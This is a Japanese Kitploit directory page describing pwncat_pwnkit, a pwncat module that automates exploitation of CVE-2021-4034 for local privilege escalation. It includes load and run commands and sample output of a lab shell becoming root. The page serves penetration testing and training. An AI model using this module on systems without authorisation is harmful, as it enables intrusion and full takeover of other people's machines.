Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
pwncat_pwnkit — pwncatモジュールで、CVE-2021-4034(pwnkit)を自動的に悪用します。 | Kitploit
ツール/GitHubGitHub/danaepp/pwncat_pwnkit
特権昇格エクスプロイトフレームワーク脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテスト
GitHubdanaepp/pwncat_pwnkit

pwncat_pwnkit

pwncatモジュールで、CVE-2021-4034(pwnkit)を自動的に悪用します。

リポジトリを見る
3284年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

pwncat_pwnkit

asciicast

はじめに

このモジュールの目的は、pwncat 使用時にターゲットに対して CVE-2021-4034 (pwnkit) の悪用を試みることです。

ディレクトリのセットアップ、ソースのコンパイル、リモートターゲットへの gcc のインストールは一切不要です。pwnkit モジュールが pwncat フレームワークを使用してこれを自動的に処理します。

セットアップと使用方法

  • pwnkit.py を pwncat-cs がインストールされているホスト上の任意の場所にコピーします。例: /home/user/pwncat_mods
  • pwncat で、次のように入力します: load /home/user/pwncat_mods
  • モジュールが読み込まれたことを確認するには、search pwnkit と入力します。次のような表示が確認できるはずです:
root@kitploit:~
(local) pwncat$ search pwnkit
                                                      Results                                                      
                   ╷                                                                                               
  Name             │ Description                                                                                   
 ══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════ 
  pwnkit           │ Exploit CVE-2021-4034 to privesc to root
  • 実行するには、run pwnkit と入力するだけです。成功すると、UID が 0 に変わり、root になっているはずです。例:
root@kitploit:~
(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0)                            manager.py:955
           Module pwnkit completed successfully                                                          run.py:100
(local) pwncat$                                                                                                    
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)

ヒント

  • 毎回 load を呼びたくない場合は、~/.local/share/pwncat/modules に配置することで、pwncat が起動時にこのモジュールを自動的に読み込むようにできます。
  • クロスコンパイラを使用して自分のマシンでエクスプロイトをビルドし、ターゲットにアップロードするには、pwncatrc ファイルに cross 変数を設定する必要があります。このファイルは通常 ~/.local/share/pwncat/pwncatrc にあります。例:
root@kitploit:~
# Set the gcc path
set cross "/usr/bin/gcc"

謝辞

Caleb Stewart 氏に特別な感謝を捧げます。開発者の視点から pwncat フレームワークを学ぶ過程で大変助けていただきました。時間ができたら、これをメインの pwncat escalate モジュールに組み込むプルリクエストを送ります…約束します。:-)

ツールをダウンロード